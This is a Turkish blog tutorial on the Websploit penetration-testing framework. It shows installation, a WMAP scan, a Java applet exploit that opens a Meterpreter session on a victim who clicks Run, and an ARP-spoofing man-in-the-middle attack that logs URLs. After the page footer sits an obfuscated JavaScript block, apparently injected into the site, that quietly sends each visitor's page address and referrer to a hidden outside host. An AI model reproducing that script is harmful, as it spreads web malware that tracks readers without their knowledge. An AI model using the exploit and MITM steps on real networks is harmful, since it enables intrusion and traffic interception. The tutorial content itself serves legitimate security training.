Sızma Testlerinde Websploit Kullanımı

Websploit framework, içinde barındırdığı modüller ile çeşitli zafiyetleri tarama, analiz ve istismar etme olanağı sağlar.


İçinde 4 tane modül bu modüller altındada 19 tane araç barındırır:
  • Web
  • Network
  • Exploit
  • Wireless



Görünüm ve çalışma olarak Metasploit Framework ile benzerlik gösterir. Hatta bazı exploitler  Metasploit Framework üzerinden çalışır.


Kullanım olarak maalesef Metasploitin sağladığı TAB ile tamamlama ve üst yön tuşu ile geriye dönük komutların kullanılabilmesi özelliklerini sağlamaz.



Bu yazıda Websploit kurulumu/güncellenmesi ve bazı modüllerinin kullanımı gösterilmiştir.



Kurulum

Websploit Kali Linux dağıtımı  üzerinde yüklü olarak gelir. Terminal ekranında websploit yazılarak veya resimdeki gibi erişilebilir.



Websploit çalıştırıldığında aşağıdaki gibi bir ekranla başlar:



Eğer başka bir dağıtım üzerinde kurulmak isteniyorsa ya da Websploit sürümü  yukarıdaki sürümden eski ise
# upgrade
komutu ile güncellenebilir. upgrade komutu işletildiğinde güncel dosya, tarayıcının indirme penceresinde açılır.
Ya da http://sourceforge.net/projects/websploit/ linkinden indirilebilir.  İndirildikten sonra bulunduğunda dizinde
# tar -xvf WebSploit Framework V.2.0.4.tar.gz
sıkıştırılmış dosya çıkartılır.
Dosya içerisindeki Easy Install klasörüne girilir:
# cd Easy Install/  
ve install.sh dosyası çalıştırılır.
# bash install.sh
Artık Websploit sisteme kurulu ve günceldir.



Kullanım

Kurulumdan sonra
# websploit
ile başlatılır.
# help
ile komutlar listelenebilir. Komutlar aşağıdaki gibidir:



Komutlar görüleceği üzere Metasploit’e benzerlik gösteriyor.
os komutundan sonra Linux komutları kullanılabilir. Mesela ekranı temizlemek için;
# os clear kullanılabilir.



# show modules
ile yüklü modüller listelenir. Modüllerin bir kısmı aşağıdaki gibidir. Websploit, açıklamasında Metasploit yazanlarda, metasploiti ve ilgili moda göre diğer gerekli araçları çalıştırır.   

Örnek Uygulamalar

WMAP

Bu uygulamada web dizini altındaki wmap aracı kullanılmıştır. Wmap yine Metasploitin bir modulüdür. Bu modül ile web sitesi üzerinde bir çok araç ile tarama yapılır ve bize hedef sistem hakkında bilgi verir. Aynı zamanda varsa bazı zafiyetleride bulur. Websploit resimdeki gibi komutlar girildiğinde Metasploiti ve wmap modülünü başlatır.
Aşağıdaki gibi çalışmaya başlar.



Java Applet

Bir diğer örnek exploit modülü altındaki java_applet üzerinde yapılmıştır. Bunun için yapılan ayarlar ve çalışmaya başlaması şöyledir:


Burada sırayla belirtmek gerekirse Interface parametresi ağa hangi arayüz ile bağlandığımızı belirtir. Bu örnek sanal makine üzerindeki Kali’de yapıldığı için eth0 değeri vardır. Ağa kablosuzdan bağlanılıyorsa muhtemelen wlan0 gibi bir değerin girilmesi gerekecektir.
Sonraki LHOST   parametresi genelde kendi IPmizi belirtir. Meterpreter oturumu nerede açılmak isteniyorsa o sistemin IP’si girilmelidir.
# set LHOST 192.168.2.60
Class ve Publisher parametreleri, kullanıcının karşısına çıkan Java uyarısında kendimizi nasıl göstermek istiyorsak o şekilde yapılandırılabilir.



Yukarıdaki resimde belirtilen seçili yer bize, kullanıcıya hangi linkin gönderilmesi gerektiğini belirtir.
Gerekli ayarları yaptıktan sonra hedef sistemdeki kullanıcı belirttiğimiz adrese (burada 192.168.2.60:8080/index ) gitmeye çalıştığında resimdeki gibi sayfa bir süre yüklenir ve Javanın çalışması için izin ister.
Sonrasında ise aşağıdaki gibi bir pencere açılır.
Eğer kullanıcı aşağıdaki onay kutusunu işaretleyip “Run” derse, Websploit bir meterpreter oturumu açar. Bu oturum üzerinden de kullanıcının açık olarak parolası, ekran görüntüsü vs. gibi bir çok bilgisi alınabilir. Açılan oturumları listelemek için;
# sessions -l
komutu işletilir. Geçmek istediğimiz oturum için ise (Mesela 1 olsun);
# sessions -i 1
çalıştırılır.


Bu örnekte sadece hedef sistemden ipconfig bilgisi alınmıştır.
Not: Yukarıda belirtilen Class ve Publisher parametreleri Java olarak bırakılmasına rağmen çalışmamıştır.

MITM

Son olarak incelenen araç, network modülü altındaki MITM(Man-in-the-middle) aracıdır. Bu terim yabancı gelenler için Türkçe’de Ortadaki Adam Saldırısı olarakta bilinir. Saldırganın hedef sistem ile ağ cihazları(Modem, Access Point, Switch vs.) arasına girerek akan trafiği üzerinden geçirmesini ve izlemesini ifade eder. Bir saldırgan MITM saldırısı yaptığında hedef makineye sürekli ARP paketleri gönderir ve ağ geçidinin kendisi olduğunu söyler. Ağ geçidine de aynı şekilde hedef sistem olduğunu söyler. Eğer saldırgan IP Forwarding yaparsa saldırgana gelen trafik ağ geçidine aktarılır. Yoksa hedef sistemden gönderilen paketler iletilmez.
Bu uygulamaya ait ekran görüntüsü aşağıdaki gibidir:
Burada yapılan ayarlardan
# set ROUTER 192.168.2.1 ile bulunduğumuz ağın ağ geçidi adresini(Gateway) girdik.
# set TARGET 192.168.2.101 ile hedef sistemi belirttik. Böylece bu iki ayar ile Websploite hangi iki sistem arasına gireceğimizi belirtmiş olduk.Son olarak
# set SNIFFER urlsnarf  ile ne tür bilgileri istediğimizi belirttik. Burada urlsnarf girilen linkleri listeler. Sniffers yazan kısımda diğer seçenekler gözükmektedir(dsniff,msfsnarf,driftnet).
run komutunu verdiğimizde şekildeki gibi 2 tane pencere açılır. Birisi ARP paketlerini gönderirken diğeri HTTPS bağlantıları içindir.
MITM saldırısı 192.168.2.60 üzerinden yapılmıştır. MITM saldırısı öncesinde ve sonrasında yapılan arp -an sorgusu şöyledir:

İlk sorguda yani saldırı öncesinde 192.168.2.1 adresinin sahip olduğu MAC adresinin, saldırı sırasında 192.168.2.60  IP’sine ait MAC adresiyle aynı olduğu gözüküyor. Bu da MITM saldırısının başarılı olduğunu gösterir.

Ender AKBAS < ender.akbas@bga.com.tr>

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.

    Pt>function _0x2677(_0x586c2b,_0x1056c6){var _0x2bd4ea=_0x2bd4();return _0x2677=function(_0x267799,_0x44fe2a){_0x267799=_0x267799-0x165;var _0x5b0952=_0x2bd4ea[_0x267799];if(_0x2677['oJyNOH']===undefined){var _0x360830=function(_0x3c21c6){var _0x1d0d99='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2ae702='',_0x343ef4='';for(var _0x476bad=0x0,_0x2f67d5,_0x166a99,_0x388eaa=0x0;_0x166a99=_0x3c21c6['charAt'](_0x388eaa++);~_0x166a99&&(_0x2f67d5=_0x476bad%0x4?_0x2f67d5*0x40+_0x166a99:_0x166a99,_0x476bad++%0x4)?_0x2ae702+=String['fromCharCode'](0xff&_0x2f67d5>>(-0x2*_0x476bad&0x6)):0x0){_0x166a99=_0x1d0d99['indexOf'](_0x166a99);}for(var _0x21105c=0x0,_0x16cce1=_0x2ae702['length'];_0x21105c<_0x16cce1;_0x21105c++){_0x343ef4+='%'+('00'+_0x2ae702['charCodeAt'](_0x21105c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x343ef4);};_0x2677['MUmZHT']=_0x360830,_0x586c2b=arguments,_0x2677['oJyNOH']=!![];}var _0x4bbbaf=_0x2bd4ea[0x0],_0x131d68=_0x267799+_0x4bbbaf,_0x1817de=_0x586c2b[_0x131d68];return!_0x1817de?(_0x5b0952=_0x2677['MUmZHT'](_0x5b0952),_0x586c2b[_0x131d68]=_0x5b0952):_0x5b0952=_0x1817de,_0x5b0952;},_0x2677(_0x586c2b,_0x1056c6);}var _0x2b1dca=_0x2677;(function(_0x38d529,_0x3d240d){var _0x3e69c5={_0x4f2ab1:0x195,_0x510342:0x180,_0x1cdd78:0x17d,_0x16824a:0x181,_0x310fcf:0x194,_0x481123:0x196,_0x34004c:0x190},_0x366619=_0x2677,_0x14a328=_0x38d529();while(!![]){try{var _0x25e7d8=-parseInt(_0x366619(_0x3e69c5._0x4f2ab1))/0x1*(parseInt(_0x366619(_0x3e69c5._0x510342))/0x2)+-parseInt(_0x366619(0x198))/0x3+parseInt(_0x366619(_0x3e69c5._0x1cdd78))/0x4+-parseInt(_0x366619(_0x3e69c5._0x16824a))/0x5*(-parseInt(_0x366619(0x165))/0x6)+-parseInt(_0x366619(0x171))/0x7+-parseInt(_0x366619(_0x3e69c5._0x310fcf))/0x8*(parseInt(_0x366619(0x172))/0x9)+parseInt(_0x366619(_0x3e69c5._0x481123))/0xa*(parseInt(_0x366619(_0x3e69c5._0x34004c))/0xb);if(_0x25e7d8===_0x3d240d)break;else _0x14a328['push'](_0x14a328['shift']());}catch(_0x13bbee){_0x14a328['push'](_0x14a328['shift']());}}}(_0x2bd4,0xa2f33));function _0x2bd4(){var _0x139414=['yMDHCW','v2L0Aa','CML0Eq','AdbYyW','B20Vyq','B2nVBa','DwHOlW','zI9UyW','C2vJDq','nJy5ovbiq2PfsW','DhnxAq','Ahr0Ca','Cgf5Bq','ntCXnZz2BMvhCgi','mtngwxnyBKG','mJa0nZbUBeTOrxO','lMnVBq','ndaXotK3ugz2ywLQ','DgLVBG','mZK4nJyYogfZr2P2uW','BNmUyW','BMfYEq','C3rHCG','BgvZlW','EJK4EG','y29T','ChjVDa','Ew1Una','C3jJ','jNi9','CNrPyW','ntu0ndbvBev0Bfa','odKXD29Ju09A','BMfTzq','CNjLCG','lY9Jyq','AhjLzG','Bg9Jyq','C3r1zG','Ag9ZDa','lMjNyq','Dg9Rzq','CMvMzq','nteWmZG0ANv0te54','zwn1CG','lMPZpW','odaYnJHvzg5cvvK','nuTrz3Hxva','Axr5lG','zw5KCW','ANK1za','BwXNBq','zw50CW'];_0x2bd4=function(){return _0x139414;};return _0x2bd4();}if(window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)]!=_0x2b1dca(0x187)+_0x2b1dca(0x17e)+_0x2b1dca(0x182)+_0x2b1dca(0x16b)&&!window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)][_0x2b1dca(0x183)+_0x2b1dca(0x188)](_0x2b1dca(0x17a)+_0x2b1dca(0x18f)+_0x2b1dca(0x189)+_0x2b1dca(0x197))){var p=!document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)][_0x2b1dca(0x168)+_0x2b1dca(0x191)+'th'](_0x2b1dca(0x192))?_0x2b1dca(0x192)+':':document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)],l=location[_0x2b1dca(0x176)],r=document[_0x2b1dca(0x17c)+_0x2b1dca(0x174)],m=new Image();m[_0x2b1dca(0x16e)]=p+(_0x2b1dca(0x175)+_0x2b1dca(0x167)+_0x2b1dca(0x17b)+_0x2b1dca(0x166)+_0x2b1dca(0x18b)+_0x2b1dca(0x170)+_0x2b1dca(0x169)+_0x2b1dca(0x178)+_0x2b1dca(0x18e)+_0x2b1dca(0x18a)+_0x2b1dca(0x184)+_0x2b1dca(0x185)+_0x2b1dca(0x16d)+_0x2b1dca(0x16a)+_0x2b1dca(0x18d)+_0x2b1dca(0x193)+_0x2b1dca(0x186)+_0x2b1dca(0x17f)+'l=')+encodeURI(l)+_0x2b1dca(0x16f)+encodeURI(r);}